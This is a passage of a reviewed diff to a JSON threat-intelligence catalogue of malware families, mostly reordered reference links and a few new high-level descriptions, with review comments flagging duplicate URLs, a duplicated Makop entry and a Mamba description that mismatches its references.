+ "https://0x00-0x7f.github.io/Netwalker-from-Powershell-reflective-loader-to-injected-Dll/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf",
+ "https://zero2auto.com/2020/05/19/netwalker-re/",
+ "https://danusminimus.github.io/Zero2Auto-Netwalker-Walkthrough/",
+ "https://s3.documentcloud.org/documents/21199896/vachon-desjardins-court-docs.pdf",
+ "https://www.bleepingcomputer.com/news/security/netwalker-ransomware-infecting-users-via-coronavirus-phishing/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf"
 ],
 "synonyms": [
 "Koko Ransomware",
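Review bot: The reordered refs list for the mailto/NetWalker entry still carries the same URL twice on the new side, `.../enel-group-hit-by-ransomware-again-netwalker-demands-14-million/` and the identical path without the trailing slash. The same kind of near-duplicate pair survives in the mail_o hunk (`labs.sentinelone.com/thundercats-...` vs `www.sentinelone.com/labs/thundercats-...`), the makadocs hunk (`kindredsec.wordpress.com/...` vs `kindredsec.com/...`) and the mars_stealer hunk (`isc.sans.edu/diary/rss/28468` vs `isc.sans.edu/diary/Arkei+Variants.../28468`). All four pairs are on the old side as well, so this sync does not introduce them, but a normalisation step in the importer (strip the trailing slash, compare host plus path) would remove them file-wide instead of cluster by cluster.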
@@ -32407,11 +33941,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o",
- "https://blog.group-ib.com/task",
 "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
 "https://rt-solar.ru/upload/iblock/b55/Ataki-na-FOIV_otchet-NKTSKI-i-Rostelekom_Solar_otkrytyy.pdf",
 "https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op",
- "https://therecord.media/fsb-nktski-foreign-cyber-mercenaries-breached-russian-federal-agencies/"
+ "https://therecord.media/fsb-nktski-foreign-cyber-mercenaries-breached-russian-federal-agencies/",
+ "https://blog.group-ib.com/task"
 ],
 "synonyms": [],
 "type": []
@@ -32438,10 +33972,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs",
- "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
+ "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html",
 "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs",
- "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html"
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
+ "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs"
 ],
 "synonyms": [],
 "type": []
@@ -32463,14 +33997,31 @@
 "value": "MakLoader"
 },
 {
- "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension “.makop”. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.",
+ "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension \u201c.makop\u201d. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. There are no known free decryption tools capable of decrypting files encrypted by MAKOP.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop",
+ "https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware",
+ "https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11",
+ "https://lifars.com/wp-content/uploads/2021/08/Makop-Ransomware-Whitepaper-case-studyNEW-1.pdf",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://twitter.com/siri_urz/status/1221797493849018368"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "db4ca498-5481-4b68-8024-edd51d552c38",
+ "value": "Makop"
+ },
+ {
+ "description": "BeforeCrypt describes that MAKOP Ransomware first appeared in 2020 as an offshoot of the PHOBOS variant, and that it has infected a number of computers since then. Files encrypted by MAKOP often have the extension \u201c.makop\u201d. You may also notice that your desktop wallpaper has changed. MAKOP uses RSA encryption. 
There are no known free decryption tools capable of decrypting files encrypted by MAKOP.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop_ransomware",
+ "https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11",
 "https://lifars.com/wp-content/uploads/2021/08/Makop-Ransomware-Whitepaper-case-studyNEW-1.pdf",
 "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
- "https://twitter.com/siri_urz/status/1221797493849018368",
- "https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11"
+ "https://twitter.com/siri_urz/status/1221797493849018368"
 ],
 "synonyms": [],
 "type": []
@@ -32479,13 +34030,13 @@
 "value": "Makop Ransomware"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Maktub is ransomware distributed via zipped Word documents. Once the file is extracted and opened, Maktub infiltrates the system and encrypts files stored on the victim's computer. Maktub ransomware adds a .NORV, .gyul (or other random) extension to each file encrypted, thus, making it straightforward to determine which files are encrypted.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub",
+ "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/",
 "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html",
- "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/",
- "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/"
+ "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/"
 ],
 "synonyms": [],
 "type": []
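Review bot: The new `Makop` cluster added in the `@@ -32463` hunk (uuid `db4ca498-5481-4b68-8024-edd51d552c38`, Malpedia `win.makop`) carries the exact same BeforeCrypt description as the existing `Makop Ransomware` cluster (`win.makop_ransomware`), and its refs are that cluster's five URLs plus the Morphisec Phobos post. Two clusters with byte-identical text for what both present as one family will double-match on any description search and give a consumer no way to tell them apart. If Malpedia genuinely keeps two entries, a `related` link between the two uuids, or one sentence in each description saying what distinguishes them, would make the split deliberate rather than look like a merge leftover. The `Makop Ransomware` object's `uuid` and `value` lines are outside the hunk.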
@@ -32507,14 +34058,14 @@
 "value": "MalumPOS"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Mamba is an updated variant of high-risk ransomware called Phobos. After successful infiltration, Mamba encrypts stored files and appends filenames with the \".mamba\" extension plus the victim's unique ID and developer's email address.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba",
+ "https://securelist.com/the-return-of-mamba-ransomware/79403/",
 "https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/",
 "https://www.ic3.gov/Media/News/2021/210323.pdf",
- "https://securelist.com/the-return-of-mamba-ransomware/79403/"
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/"
 ],
 "synonyms": [
 "DiskCryptor",
@@ -32546,9 +34097,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf",
 "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2",
- "https://www.youtube.com/watch?v=NFJqD-LcpIg"
+ "https://www.youtube.com/watch?v=NFJqD-LcpIg",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf"
 ],
 "synonyms": [
 "junidor",
@@ -32605,6 +34156,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa",
+ "https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/",
+ "https://www.sangfor.com/blog/cybersecurity/alert-new-globeimposter-olympian-gods-20-coming",
 "https://id-ransomware.blogspot.com/2019/02/maoloa-ransomware.html"
 ],
 "synonyms": [],
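Review bot: The description added for `win.mamba` in the `@@ -32507` hunk does not match the cluster it is attached to: it calls Mamba `an updated variant of high-risk ransomware called Phobos` that appends a `.mamba` extension, which appears to be PCrisk's write-up of a Phobos-derived file locker, whereas the synonym on the line below (`DiskCryptor`) and the refs (`the-return-of-mamba-ransomware`, `bksod-by-ransomware-hddcryptor-...`, the IC3 2021 PDF) all point to the HDDCryptor/DiskCryptor full-disk encryptor. A consumer keying on the description would classify the wrong family. Until a matching summary is available, either drop the sentence `According to PCrisk, Mamba is an updated variant of high-risk ransomware called Phobos.` or prefix the text with a note that PCrisk's Mamba is a different family from the one the references cover. The synonyms list continues outside the hunk.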
@@ -32632,8 +34185,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap"
 ],
 "synonyms": [],
 "type": []
@@ -32647,8 +34200,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa",
 "https://www.us-cert.gov/ics/advisories/ICSA-10-090-01",
- "https://defintel.com/docs/Mariposa_Analysis.pdf",
- "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/"
+ "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/",
+ "https://defintel.com/docs/Mariposa_Analysis.pdf"
 ],
 "synonyms": [
 "Autorun",
@@ -32693,26 +34246,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer", - "https://isc.sans.edu/diary/rss/28468", - "https://cyberint.com/blog/research/mars-stealer/", - "https://ke-la.com/information-stealers-a-new-landscape/", - "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer", "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/", + "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/", + "https://blog.morphisec.com/threat-research-mars-stealer", + "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://3xp0rt.com/posts/mars-stealer", + "https://ke-la.com/information-stealers-a-new-landscape/", + "https://cyberint.com/blog/research/mars-stealer/", + "https://isc.sans.edu/diary/rss/28468", + "https://blog.sekoia.io/mars-a-red-hot-information-stealer/", + "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer", + "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer", "https://cert.gov.ua/article/38606", "https://x-junior.github.io/malware%20analysis/MarsStealer/", - "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-mars-stealer", - "https://3xp0rt.com/posts/mars-stealer", - "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468", - "https://blog.morphisec.com/threat-research-mars-stealer", - "https://blog.sekoia.io/mars-a-red-hot-information-stealer/", - 
"https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", - "https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/", - "https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", "https://drive.google.com/file/d/14cmYxzowVLyuiS5qDGOKzgI2_vak2Fve/view", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", "https://resources.infosecinstitute.com/topic/mars-stealer-malware-analysis/", - "https://threatmon.io/mars-stealer-malware-analysis-threatmon/" + "https://threatmon.io/mars-stealer-malware-analysis-threatmon/", + "https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/" ], "synonyms": [], "type": [] 
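Review bot: The regenerated Mars Stealer refs still carry the same ISC diary twice — `https://isc.sans.edu/diary/rss/28468` and `https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468` both resolve to diary 28468 — and the commit moves them around without collapsing them. Consumers that count or display references per family will report inflated, noisy data; a normalisation step in the import (canonical host, strip the `rss/` form in favour of the titled one) would remove this class of duplicate across the file. The duplicate predates this change, so this is a request for the generator rather than the upstream data.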
@@ -32738,16 +34291,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.masslogger", - "https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-anti-analysis-man-in-the-middle-approach.html", - "https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/", - "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html", - "https://twitter.com/pancak3lullz/status/1255893734241304576", - "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7", "https://fr3d.hk/blog/masslogger-frankenstein-s-creation", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/", "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", "https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger", "https://www.seqrite.com/blog/masslogger-an-emerging-spyware-and-keylogger/", - "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/" + "https://twitter.com/pancak3lullz/status/1255893734241304576", + "https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/", + "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7", + "https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-anti-analysis-man-in-the-middle-approach.html", + "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html" ], "synonyms": [], "type": [] 
@@ -32756,18 +34309,18 @@ "value": "MASS Logger" }, { - "description": "", + "description": "According to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections.\r\n\r\nSince it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus", - "https://medium.com/@DCSO_CyTec/a-deal-with-the-devil-analysis-of-a-recent-matanbuchus-sample-3ce991951d6a", - "https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/", - "https://research.openanalysis.net/matanbuchus/loader/yara/triage/dumpulator/emulation/2022/06/19/matanbuchus-triage.html", - "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer", "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/", + "https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer", "https://www.0ffset.net/reverse-engineering/matanbuchus-loader-analysis/", "https://isc.sans.edu/diary/rss/28752", - "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/" + "https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/", + "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/", + "https://medium.com/@DCSO_CyTec/a-deal-with-the-devil-analysis-of-a-recent-matanbuchus-sample-3ce991951d6a", + "https://research.openanalysis.net/matanbuchus/loader/yara/triage/dumpulator/emulation/2022/06/19/matanbuchus-triage.html" ], "synonyms": [], "type": [] 
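Review bot: The new Matanbuchus description embeds a CRLF paragraph break (`\r\n\r\n`), whereas every other description added in this patch is a single line with no control characters; that inconsistency likely comes from the upstream text being pasted verbatim. Depending on the renderer, the `\r` is shown as a stray character or silently dropped, so I would normalise it in the import to either `\n\n` or a single space before writing the JSON. A small test that rejects `\r` in any `description` value would stop this recurring.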
@@ -32802,16 +34355,16 @@ "value": "Matrix Banker" }, { - "description": "", + "description": "Matrix is a ransomware that encrypts a victim's files and demands a ransom in cryptocurrency to decrypt them. It is distributed through phishing emails, hacking toolkits, and software downloaders. Matrix is a serious threat and can cause significant damage to a victim's data.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom", - "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-matrix-report.pdf", - "https://news.sophos.com/en-us/2019/01/30/matrix-targeted-small-scale-canary-in-the-coal-mine-ransomware/", - "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware", "https://unit42.paloaltonetworks.com/matrix-ransomware/", + "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware", + "https://news.sophos.com/en-us/2019/01/30/matrix-targeted-small-scale-canary-in-the-coal-mine-ransomware/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf" + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-matrix-report.pdf" ], "synonyms": [], "type": [] @@ -32824,8 +34377,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", - "http://www.clearskysec.com/tulip/", - "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf", + "http://www.clearskysec.com/tulip/" ], "synonyms": [], "type": [] 
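Review bot: The new Matrix description has no source attribution, unlike the Mamba and Matanbuchus descriptions in this same patch, which open with "According to PCrisk, ..."; in a CTI cluster the provenance of a summary is part of the data, and its closing sentence ("Matrix is a serious threat and can cause significant damage to a victim's data") is evaluative filler that adds nothing an analyst can act on. I would prefix the text with `According to <SOURCE-NAME>, ` (placeholder — take the actual source from wherever this summary was imported) and drop the last sentence, leaving the distribution vectors and the cryptocurrency ransom demand, which are the actionable parts.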
@@ -32851,8 +34404,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi", - "https://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf" + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2012/NormanShark-MaudiOperation.pdf", + "https://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html" ], "synonyms": [], "type": [] @@ -32865,11 +34418,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maui", + "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", "https://www.cisa.gov/uscert/ncas/alerts/aa22-187a", "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF", - "https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf", "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-187a-north-korean%20state-sponsored-cyber-actors-use-maui-ransomware-to-target-the-hph-sector.pdf", - "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/" + "https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf" ], "synonyms": [], "type": [] 
@@ -32895,117 +34448,117 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maze", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", - "https://securelist.com/maze-ransomware/99137/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", - "https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/", - "https://twitter.com/certbund/status/1192756294307995655", - "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - 
"https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://adversary.crowdstrike.com/adversary/twisted-spider/", - "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md", - "https://www.secureworks.com/research/threat-profiles/gold-village", - "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/", - "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/", - "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/", - "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/", - "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/", - "https://sites.temple.edu/care/ci-rw-attacks/", - "http://www.secureworks.com/research/threat-profiles/gold-village", - "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", - 
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/", - "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", - "https://www.docdroid.net/dUpPY5s/maze.pdf", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", - "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", - "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", - "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", "https://news.sophos.com/en-us/2020/05/12/maze-ransomware-1-year-counting/", - "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", - "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://securelist.com/targeted-ransomware-encrypting-data/99255/", - "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", - 
"https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", - "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf", "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", - "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", - "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", - "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", - 
